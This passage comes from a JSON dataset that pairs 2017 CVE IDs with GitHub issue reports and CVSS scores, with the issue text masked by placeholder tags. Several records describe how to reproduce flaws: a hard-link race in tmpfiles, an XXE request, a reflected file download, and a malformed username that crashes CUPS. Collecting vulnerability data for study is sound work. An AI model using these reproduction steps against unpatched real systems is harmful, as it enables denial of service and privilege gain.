  11514. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11515. "severity": "MEDIUM",
  11516. "baseScore": 6.5,
  11517. "impactScore": 3.6,
  11518. "exploitabilityScore": 2.8
  11519. },
  11520. {
  11521. "CVE_ID": "CVE-2017-18029",
  11522. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/691",
  11523. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/691",
  11524. "Repo_new": "imagemagick/imagemagick",
  11525. "Issue_Created_At": "2017-08-22T16:03:42Z",
  11526. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in coders/mat.c ,which allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
  11527. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11528. "severity": "MEDIUM",
  11529. "baseScore": 6.5,
  11530. "impactScore": 3.6,
  11531. "exploitabilityScore": 2.8
  11532. },
  11533. {
  11534. "CVE_ID": "CVE-2017-18048",
  11535. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/426",
  11536. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/426",
  11537. "Repo_new": "monstra-cms/monstra",
  11538. "Issue_Created_At": "2017-11-20T11:51:56Z",
  11539. "description": "Patch for Remote Command Execution Vulnerability. Hi MENTIONTAG Kindly blacklist extensions all uppercase or a combination of uppercase and lowercase APITAG also in FILETAG",
  11540. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  11541. "severity": "HIGH",
  11542. "baseScore": 8.8,
  11543. "impactScore": 5.9,
  11544. "exploitabilityScore": 2.8
  11545. },
  11546. {
  11547. "CVE_ID": "CVE-2017-18077",
  11548. "Issue_Url_old": "https://github.com/juliangruber/brace-expansion/issues/33",
  11549. "Issue_Url_new": "https://github.com/juliangruber/brace-expansion/issues/33",
  11550. "Repo_new": "juliangruber/brace-expansion",
  11551. "Issue_Created_At": "2017-03-02T06:35:17Z",
  11552. "description": "APITAG in expand. APITAG will cause a APITAG accept URLTAG will fix the security bug.",
  11553. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  11554. "severity": "HIGH",
  11555. "baseScore": 7.5,
  11556. "impactScore": 3.6,
  11557. "exploitabilityScore": 3.9
  11558. },
  11559. {
  11560. "CVE_ID": "CVE-2017-18078",
  11561. "Issue_Url_old": "https://github.com/systemd/systemd/issues/7736",
  11562. "Issue_Url_new": "https://github.com/systemd/systemd/issues/7736",
  11563. "Repo_new": "systemd/systemd",
  11564. "Issue_Created_At": "2017-12-24T17:33:43Z",
  11565. "description": "tmpfiles: unsafe handling of hard links and a race condition. These issues only affect a vanilla kernel, so for any of this to make sense on a patched distro kernel, you'll want to disable the following: APITAG The tmpfiles.d specification for the Z type more or less implies some kind of recursive chown. The spec heads off one type of vulnerability by saying that symlinks should not be followed; however, hard links are still a problem. Consider the following: APITAG The first time that tmpfiles is run, everything is fine. But then my \"mjo\" user owns the directory in question, and I can create a hard link... APITAG and re run tmpfiles... APITAG to take ownership of APITAG : APITAG Now, I said that everything was fine the first time that tmpfiles was run, but I lied. The recursive chown moves from the top down, meaning that APITAG is chowned after APITAG . There is a race condition there that can be exploited. In another terminal, you can run, APITAG and if you're lucky, the hard link will get created after you own the APITAG directory, but before chown is called on x . This particular race condition isn't unique to the Z type. For another example, consider, APITAG Here, the same thing happens, and the \"mjo\" user has some time to replace foo with a hard link.",
  11566. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  11567. "severity": "HIGH",
  11568. "baseScore": 7.8,
  11569. "impactScore": 5.9,
  11570. "exploitabilityScore": 1.8
  11571. },
  11572. {
  11573. "CVE_ID": "CVE-2017-18120",
  11574. "Issue_Url_old": "https://github.com/kohler/gifsicle/issues/117",
  11575. "Issue_Url_new": "https://github.com/kohler/gifsicle/issues/117",
  11576. "Repo_new": "kohler/gifsicle",
  11577. "Issue_Created_At": "2017-10-16T13:21:05Z",
  11578. "description": "denial of service attack. Hi, I received two report bugs that may allow a denial of service attack. Maybe one has already been fixed NUMBERTAG CVETAG But this one is new I guess. CVETAG Regards, Herbert",
  11579. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  11580. "severity": "HIGH",
  11581. "baseScore": 7.8,
  11582. "impactScore": 5.9,
  11583. "exploitabilityScore": 1.8
  11584. },
  11585. {
  11586. "CVE_ID": "CVE-2017-18123",
  11587. "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/2029",
  11588. "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/2029",
  11589. "Repo_new": "dokuwiki/dokuwiki",
  11590. "Issue_Created_At": "2017-06-27T12:49:21Z",
  11591. "description": "reflected file download vulnerability. originally reported in URLTAG Description The APITAG parameter on APITAG does not properly encode user input, which leads to the reflected file download vulnerability. Example: APITAG The server responds with: ERRORTAG . Impact This can lead to arbitrary code execution on a victim's machine! Reproduction on Windows NUMBERTAG Open Chrome Browser NUMBERTAG isit redacted contained a link with a download attribute NUMBERTAG Right click the Download link and click Save Link As and then save NUMBERTAG APITAG should then download, which contains the attacker's shellcode, downloaded from APITAG If the user runs this batch file in Windows, it will open your calculator! This could lead to the entire compromise of the victim's computer. Patch I recommend URL encoding any characters in the server response (if the ajax call is not found) such as APITAG and APITAG and APITAG References URLTAG URLTAG URLTAG",
  11592. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  11593. "severity": "HIGH",
  11594. "baseScore": 8.6,
  11595. "impactScore": 6.0,
  11596. "exploitabilityScore": 1.8
  11597. },
  11598. {
  11599. "CVE_ID": "CVE-2017-18183",
  11600. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/143",
  11601. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/143",
  11602. "Repo_new": "qpdf/qpdf",
  11603. "Issue_Created_At": "2017-08-12T07:51:55Z",
  11604. "description": "stack overflow / crash on malformed input in APITAG The attached file will crash qpdf. It seems it's running into an endless recursion and thus a stack overflow. Found with afl. FILETAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffda4d NUMBERTAG f NUMBERTAG pc NUMBERTAG ba NUMBERTAG bp NUMBERTAG ffda4d NUMBERTAG c0 sp NUMBERTAG ffda4d NUMBERTAG f NUMBERTAG T NUMBERTAG ba NUMBERTAG in operator new(unsigned long) ( PATHTAG NUMBERTAG c NUMBERTAG in APITAG ) PATHTAG NUMBERTAG c NUMBERTAG in APITAG , int, int) PATHTAG NUMBERTAG c NUMBERTAG in APITAG , int, int) PATHTAG NUMBERTAG b NUMBERTAG af in APITAG , int, int) PATHTAG NUMBERTAG b NUMBERTAG af in APITAG int) PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG",
  11605. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11606. "severity": "MEDIUM",
  11607. "baseScore": 5.5,
  11608. "impactScore": 3.6,
  11609. "exploitabilityScore": 1.8
  11610. },
  11611. {
  11612. "CVE_ID": "CVE-2017-18184",
  11613. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/147",
  11614. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/147",
  11615. "Repo_new": "qpdf/qpdf",
  11616. "Issue_Created_At": "2017-08-23T09:37:44Z",
  11617. "description": "stack out of bounds read in function iterate_rc4. The attached file will cause an out of bounds read in qpdf, detectable with address sanitizer. FILETAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffee NUMBERTAG f NUMBERTAG at pc NUMBERTAG ee NUMBERTAG bp NUMBERTAG ffee NUMBERTAG f NUMBERTAG sp NUMBERTAG ffee NUMBERTAG f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffee NUMBERTAG f NUMBERTAG thread T NUMBERTAG ee NUMBERTAG in iterate_rc4(unsigned char , int, unsigned char , int, int, bool) PATHTAG NUMBERTAG in APITAG std::char_traits APITAG , std::allocator APITAG >&, APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG const&) PATHTAG NUMBERTAG in APITAG std::char_traits APITAG , std::allocator APITAG >&, APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG const&) PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG e6c in QPDF::parse(char const ) PATHTAG NUMBERTAG e1a in APITAG const , char const ) PATHTAG NUMBERTAG d in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG f NUMBERTAG f0 in __libc_start_main APITAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffee NUMBERTAG f NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG cf in APITAG PATHTAG This frame has NUMBERTAG object(s NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG <== Memory access at offset NUMBERTAG overflows this variable NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG id NUMBERTAG id_obj NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG 
NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG encryption_dict NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG [ ERRORTAG NUMBERTAG APITAG NUMBERTAG O NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG U NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG OE NUMBERTAG UE NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG CF NUMBERTAG APITAG NUMBERTAG keys NUMBERTAG cdict NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG method_name NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG EFF NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG data NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG perms_valid NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG",
  11618. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11619. "severity": "MEDIUM",
  11620. "baseScore": 5.5,
  11621. "impactScore": 3.6,
  11622. "exploitabilityScore": 1.8
  11623. },
  11624. {
  11625. "CVE_ID": "CVE-2017-18185",
  11626. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/150",
  11627. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/150",
  11628. "Repo_new": "qpdf/qpdf",
  11629. "Issue_Created_At": "2017-08-27T15:25:54Z",
  11630. "description": "heap out of bounds read (large) in APITAG The attached file causes an out of bounds heap read, detectable with asan, found with libfuzzer. FILETAG ASAN error NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG at pc NUMBERTAG bcf NUMBERTAG bp NUMBERTAG ffe NUMBERTAG cea NUMBERTAG sp NUMBERTAG ffe NUMBERTAG ce1e0 READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG thread T NUMBERTAG bcf NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG c4 in APITAG char , unsigned long) PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG ddf in APITAG PATHTAG NUMBERTAG ddf in APITAG char , unsigned long) PATHTAG NUMBERTAG in APITAG char , int, int) PATHTAG NUMBERTAG e6c in APITAG char , unsigned long) PATHTAG NUMBERTAG e NUMBERTAG b0 in APITAG int, long long, unsigned long, APITAG Pipeline , bool) PATHTAG NUMBERTAG e in APITAG , int, int, long long, unsigned long, APITAG Pipeline , bool) PATHTAG NUMBERTAG e in APITAG , unsigned long, qpdf_stream_decode_level_e, bool) PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG ed6 in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG long, APITAG PATHTAG NUMBERTAG c in APITAG long) PATHTAG NUMBERTAG f NUMBERTAG in QPDF::read_xref(long long) PATHTAG NUMBERTAG e3f in QPDF::parse(char const ) PATHTAG NUMBERTAG e1a in APITAG const , char const ) PATHTAG NUMBERTAG d in main PATHTAG NUMBERTAG f8d7e6e NUMBERTAG f0 in __libc_start_main APITAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG c NUMBERTAG in operator APITAG long) ( PATHTAG NUMBERTAG e3 in APITAG const , Pipeline , APITAG unsigned int, unsigned int) PATHTAG",
  11631. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11632. "severity": "MEDIUM",
  11633. "baseScore": 5.5,
  11634. "impactScore": 3.6,
  11635. "exploitabilityScore": 1.8
  11636. },
  11637. {
  11638. "CVE_ID": "CVE-2017-18186",
  11639. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/149",
  11640. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/149",
  11641. "Repo_new": "qpdf/qpdf",
  11642. "Issue_Created_At": "2017-08-24T09:59:52Z",
  11643. "description": "xref loop causes qpdf to hang. The attached file will cause an infinite loop in qpdf due to looping xref's. FILETAG This is actually an example from a six year old bug in evince, discovered by andreas bogk, see: CVETAG URLTAG",
  11644. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11645. "severity": "MEDIUM",
  11646. "baseScore": 5.5,
  11647. "impactScore": 3.6,
  11648. "exploitabilityScore": 1.8
  11649. },
  11650. {
  11651. "CVE_ID": "CVE-2017-18188",
  11652. "Issue_Url_old": "https://github.com/OpenRC/opentmpfiles/issues/3",
  11653. "Issue_Url_new": "https://github.com/openrc/opentmpfiles/issues/3",
  11654. "Repo_new": "openrc/opentmpfiles",
  11655. "Issue_Created_At": "2017-12-24T14:52:54Z",
  11656. "description": "Unsafe use of recursive chown in \"Z\" support. The tmpfiles.d specification for the Z type more or less implies some kind of recursive chown. The spec heads off one type of vulnerability by saying that symlinks should not be followed; however, hard links are still a problem. Consider the following: CODETAG The first time that opentmpfiles setup is launched, everything is fine. But then my \"mjo\" user owns the directory in question, and I can create a hard link... APITAG and restart opentmpfiles setup... ERRORTAG and now I own APITAG ! APITAG This happens, ultimately, because APITAG will \"follow\" a hard link. This same problem was addressed in APITAG checkpath helper in Gentoo bug NUMBERTAG CVETAG .",
  11657. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  11658. "severity": "MEDIUM",
  11659. "baseScore": 5.5,
  11660. "impactScore": 3.6,
  11661. "exploitabilityScore": 1.8
  11662. },
  11663. {
  11664. "CVE_ID": "CVE-2017-18197",
  11665. "Issue_Url_old": "https://github.com/jgraph/mxgraph/issues/124",
  11666. "Issue_Url_new": "https://github.com/jgraph/mxgraph/issues/124",
  11667. "Repo_new": "jgraph/mxgraph",
  11668. "Issue_Created_At": "2017-11-22T04:31:44Z",
  11669. "description": "APITAG vulnerable to XXE attack. APITAG instance in APITAG is missing flags to prevent external entity and doctype declaration, making it vulnerable to XXE attacks. At minimum set the flags used in APITAG example. Setting \" URLTAG \" to false would additionally prevent loading of external DTD. Below are steps to reproduce. It'll need external DTD to actually extract anything but from the stack trace is sufficient to show the class is vulnerable to XXE NUMBERTAG Set up and run the Java example NUMBERTAG POST to APITAG with the following payload xml= APITAG APITAG APITAG ]> APITAG APITAG APITAG NUMBERTAG e NUMBERTAG b APITAG APITAG APITAG NUMBERTAG e; APITAG APITAG NUMBERTAG Make a GET request to URLTAG NUMBERTAG erify it's trying to read an non existent \"/blah\" file",
  11670. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11671. "severity": "CRITICAL",
  11672. "baseScore": 9.8,
  11673. "impactScore": 5.9,
  11674. "exploitabilityScore": 3.9
  11675. },
  11676. {
  11677. "CVE_ID": "CVE-2017-18209",
  11678. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/790",
  11679. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/790",
  11680. "Repo_new": "imagemagick/imagemagick",
  11681. "Issue_Created_At": "2017-09-30T07:04:44Z",
  11682. "description": "null pointer dereference in APITAG Here is the critical code: (in APITAG APITAG APITAG may return NULL, so the following operations on the \"temp\" will dereference null pointer to cause memory error.",
  11683. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  11684. "severity": "HIGH",
  11685. "baseScore": 8.8,
  11686. "impactScore": 5.9,
  11687. "exploitabilityScore": 2.8
  11688. },
  11689. {
  11690. "CVE_ID": "CVE-2017-18210",
  11691. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/791",
  11692. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/791",
  11693. "Repo_new": "imagemagick/imagemagick",
  11694. "Issue_Created_At": "2017-09-30T07:06:03Z",
  11695. "description": "null pointer dereference in APITAG Here is the critical code: (in APITAG CODETAG APITAG may return NULL, so the following operations on the APITAG will dereference null pointer to cause memory error.",
  11696. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11697. "severity": "CRITICAL",
  11698. "baseScore": 9.8,
  11699. "impactScore": 5.9,
  11700. "exploitabilityScore": 3.9
  11701. },
  11702. {
  11703. "CVE_ID": "CVE-2017-18211",
  11704. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/792",
  11705. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/792",
  11706. "Repo_new": "imagemagick/imagemagick",
  11707. "Issue_Created_At": "2017-09-30T07:07:14Z",
  11708. "description": "null pointer dereference in APITAG Here is the critical code: (in APITAG ERRORTAG APITAG may return NULL, so the following operations on the APITAG will dereference null pointer to cause memory error.",
  11709. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11710. "severity": "CRITICAL",
  11711. "baseScore": 9.8,
  11712. "impactScore": 5.9,
  11713. "exploitabilityScore": 3.9
  11714. },
  11715. {
  11716. "CVE_ID": "CVE-2017-18212",
  11717. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2140",
  11718. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2140",
  11719. "Repo_new": "jerryscript-project/jerryscript",
  11720. "Issue_Created_At": "2017-12-07T06:24:06Z",
  11721. "description": "heap buffer overflow in lit_read_code_unit_from_hex. the following poc can trigger a heap buffer overflow bugs. ========================== APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG d at pc NUMBERTAG b6 bp NUMBERTAG bfb5e7f8 sp NUMBERTAG bfb5e7e8 READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG d thread T NUMBERTAG b5 in lit_read_code_unit_from_hex PATHTAG NUMBERTAG c2 in re_parse_char_class PATHTAG NUMBERTAG bd NUMBERTAG in re_parse_alternative PATHTAG NUMBERTAG d NUMBERTAG in re_compile_bytecode PATHTAG NUMBERTAG af7 in ecma_op_create_regexp_object PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG ae0dd in ecma_builtin_dispatch_call PATHTAG NUMBERTAG fbd5e in ecma_op_function_call PATHTAG NUMBERTAG a NUMBERTAG c6 in opfunc_call PATHTAG NUMBERTAG a NUMBERTAG c6 in vm_execute PATHTAG NUMBERTAG a9dd5 in vm_run PATHTAG NUMBERTAG a9dd5 in vm_run_global PATHTAG NUMBERTAG in jerry_run PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG b6fc NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG fc9d ( PATHTAG NUMBERTAG b NUMBERTAG d is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG b NUMBERTAG b NUMBERTAG d) allocated by thread T0 here NUMBERTAG b NUMBERTAG f6dee in malloc ( PATHTAG NUMBERTAG f4c4 in APITAG PATHTAG NUMBERTAG f4c4 in jmem_heap_gc_and_alloc_block PATHTAG NUMBERTAG f4c4 in jmem_heap_alloc_block PATHTAG NUMBERTAG ab0b in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG ccbb in parser_compute_indicies PATHTAG NUMBERTAG ccbb in parser_post_processing PATHTAG NUMBERTAG in parser_parse_source PATHTAG NUMBERTAG b NUMBERTAG in parser_parse_script PATHTAG NUMBERTAG b1 in jerry_parse PATHTAG NUMBERTAG b1 in jerry_parse_named_resource PATHTAG NUMBERTAG c NUMBERTAG d in main PATHTAG NUMBERTAG b6fc NUMBERTAG in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG lit_read_code_unit_from_hex Shadow bytes around the buggy address 
NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fd fa NUMBERTAG b NUMBERTAG e0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fa NUMBERTAG b NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING the platform is ubuntu NUMBERTAG and the build options are: python PATHTAG clean debug compile flag= fsanitize=address compile flag= m NUMBERTAG compile flag= fno omit frame pointer compile flag= fno common jerry libc=off static link=off lto=off error message=on system allocator=on",
  11722. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11723. "severity": "CRITICAL",
  11724. "baseScore": 9.8,
  11725. "impactScore": 5.9,
  11726. "exploitabilityScore": 3.9
  11727. },
  11728. {
  11729. "CVE_ID": "CVE-2017-18214",
  11730. "Issue_Url_old": "https://github.com/moment/moment/issues/4163",
  11731. "Issue_Url_new": "https://github.com/moment/moment/issues/4163",
  11732. "Repo_new": "moment/moment",
  11733. "Issue_Created_At": "2017-09-08T09:34:22Z",
  11734. "description": "Vulnerable Regular Expression. The following regular expression used to parse dates specified as strings is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  11735. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  11736. "severity": "HIGH",
  11737. "baseScore": 7.5,
  11738. "impactScore": 3.6,
  11739. "exploitabilityScore": 3.9
  11740. },
  11741. {
  11742. "CVE_ID": "CVE-2017-18239",
  11743. "Issue_Url_old": "https://github.com/jasongoodwin/authentikat-jwt/issues/12",
  11744. "Issue_Url_new": "https://github.com/jasongoodwin/authentikat-jwt/issues/12",
  11745. "Repo_new": "jasongoodwin/authentikat-jwt",
  11746. "Issue_Created_At": "2015-03-23T18:30:21Z",
  11747. "description": "add option to do full comparison to prevent time based guessing of the private key. Tim APITAG flagged that users may be able to guess how correct their guesses are by measuring time of response. Seems this might be difficult to actually exploit but we can add some non blocking delays or otherwise do a full comparison.",
  11748. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11749. "severity": "CRITICAL",
  11750. "baseScore": 9.8,
  11751. "impactScore": 5.9,
  11752. "exploitabilityScore": 3.9
  11753. },
  11754. {
  11755. "CVE_ID": "CVE-2017-18248",
  11756. "Issue_Url_old": "https://github.com/apple/cups/issues/5143",
  11757. "Issue_Url_new": "https://github.com/apple/cups/issues/5143",
  11758. "Repo_new": "apple/cups",
  11759. "Issue_Created_At": "2017-10-16T11:19:04Z",
  11760. "description": "Remote APITAG attack against cupsd via invalid username and malicious D Bus library. Any user who can submit a print job to a CUPS server can abort the cupsd running on the CUPS server by submitting a job as a user with an invalid username. I tested it with CUPS NUMBERTAG and also the newest NUMBERTAG so that I assume the issue is old and not fixed. I think this issue here has the same root cause as URLTAG As far as I see the fix there belongs to the LPD mini daemon but this issue here belongs to the cupsd. How to reproduce: On a APITAG client system create a user with an invalid username I use 'bin\u00e4r' as username that has the character \u00e4 APITAG small letter a with diaeresis, e.g. the German a umlaut) encoded in ISO NUMBERTAG encoding so that that username in hex byte values is APITAG NUMBERTAG e e NUMBERTAG APITAG Usually one cannot create such a username with \"useradd\" (because it rejects invalid usernames) so that one must manually edit /etc/passwd. Then as this user submit a print job from the client system to a (possibly remote) CUPS server. The cupsd on the CUPS server will bet aborted inside a D Bus library call that sends SIGABRT which aborts the whole caller process. 
In PATHTAG or nowadays in the \"journalctl\" one gets things like APITAG NUMBERTAG APITAG e NUMBERTAG cupsd NUMBERTAG process NUMBERTAG arguments to APITAG were incorrect, assertion \"_dbus_check_is_valid_utf8 ( string_p)\" failed in file dbus message.c line NUMBERTAG APITAG e NUMBERTAG cupsd NUMBERTAG This is normally a bug in some application using the D Bus library NUMBERTAG APITAG e NUMBERTAG cupsd NUMBERTAG D Bus not built with rdynamic so unable to print a backtrace NUMBERTAG APITAG e NUMBERTAG systemd NUMBERTAG APITAG Main process exited, code=dumped, status NUMBERTAG ABRT NUMBERTAG APITAG e NUMBERTAG systemd NUMBERTAG APITAG Unit entered failed state NUMBERTAG APITAG e NUMBERTAG systemd NUMBERTAG APITAG Failed with result 'core dump NUMBERTAG APITAG e NUMBERTAG systemd coredump NUMBERTAG Process NUMBERTAG cupsd) of user NUMBERTAG dumped core. APITAG or APITAG Oct NUMBERTAG caps cupsd NUMBERTAG process NUMBERTAG arguments to APITAG were incorrect, assertion \"_dbus_check_is_valid_utf8 ( string_p)\" failed in file dbus message.c line NUMBERTAG Oct NUMBERTAG caps cupsd NUMBERTAG This is normally a bug in some application using the D Bus library. Oct NUMBERTAG caps cupsd NUMBERTAG D Bus not built with rdynamic so unable to print a backtrace APITAG",
